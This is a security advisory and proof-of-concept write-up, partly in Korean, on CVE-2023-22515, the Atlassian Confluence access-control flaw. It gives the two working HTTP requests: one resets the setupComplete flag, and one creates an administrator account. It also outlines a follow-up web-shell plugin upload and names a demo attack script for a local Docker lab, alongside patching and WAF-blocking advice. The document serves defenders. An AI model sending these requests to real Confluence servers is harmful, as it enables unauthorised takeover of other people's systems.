
Technical analysis and proof-of-concept exploit for CVE-2023-22515, a critical broken access control vulnerability in Atlassian Confluence allowing unauthenticated admin account creation and system compromise.
[!IMPORTANT] Urgent Security Alert: This vulnerability has a CVSS score of 10.0 (Critical), the highest risk level. If you are using an affected version, immediate patching is required.
CVE-2023-22515 is a critical Broken Access Control vulnerability discovered in Atlassian Confluence Data Center and Server. An attacker can remotely manipulate the server's configuration state without authentication, create an administrator account, and fully compromise the system.
| Item | Details |
|---|---|
| Vulnerability ID | CVE-2023-22515 |
| Severity | CRITICAL (CVSS 10.0) |
| Affected Versions | 8.0.0 ~ 8.5.1 (check specific versions) |
| Attack Type | Authentication bypass and privilege escalation |
This vulnerability is triggered by an attacker changing the bootstrapStatusProvider.applicationConfig.setupComplete value to false via the /server-info.action endpoint.
sequenceDiagram
participant Attacker as 😈 공격자
participant Server as 🖥️ Confluence 서버
participant Config as ⚙️ 설정 관리자
Note over Attacker, Server: 1단계: 설정 상태 초기화 공격
Attacker->>Server: GET /server-info.action?setupComplete=false
Server->>Config: 메모리 상의 설정 완료 플래그 해제
Config-->>Server: 상태 변경 완료 (설치 모드로 전환)
Server-->>Attacker: HTTP 200/302 OK
Note over Attacker, Server: 2단계: 관리자 계정 생성
Attacker->>Server: POST /setup/setupadministrator.action<br/>(새로운 관리자 정보 전송)
Server->>Server: 보안 검증 우회 (설치 모드라 허용됨)
Server-->>Attacker: 계정 생성 성공 및 로그인
Note over Attacker, Server: 3단계: 시스템 장악 (RCE)
Attacker->>Server: 악성 플러그인 업로드 (Web Shell)
Server-->>Attacker: 원격 명령 실행 권한 획득
[!NOTE] Core Principle: Instead of modifying the persistent configuration file (
confluence.cfg.xml), this attack bypasses access control logic by altering runtime state in memory.
This vulnerability is caused by a parameter binding flaw in the XWork2 framework and the lack of external input validation for the sensitive attribute (setupComplete) in Confluence's action class (ServerInfoAction).
An attacker can incapacitate the server with simple HTTP requests.
1. Configuration Reset Request:
GET /server-info.action?bootstrapStatusProvider.applicationConfig.setupComplete=false HTTP/1.1
Host: target-confluence.com
2. Admin Creation Request:
POST /setup/setupadministrator.action HTTP/1.1
...
username=hacker_admin&password=P@ssw0rd123...
The reproduction kit (cve-2023-22515-repro) provided with this report allows you to practice the vulnerability in a safe Docker environment.
Includes a demo script to visually observe the actual hacking process in the terminal.
# Demo execution command
bash cinematic_pwn.sh
[!TIP] The demo script automatically performs an attack against a real server (
localhost:8090), creates an administrator account, and attempts to log in, showing the entire process.
The most reliable solution is to upgrade to a fixed version provided by Atlassian.
If patching is difficult, block access to the following URL patterns using network security devices (WAF, load balancer, etc.).
*/setup/*CVE-2023-22515 is a critical vulnerability with very low attack complexity that can lead to full system compromise. Security administrators should apply patches immediately and monitor for potential breaches.
Date: 2026-01-16 | Author: Antigravity Security Analysis Team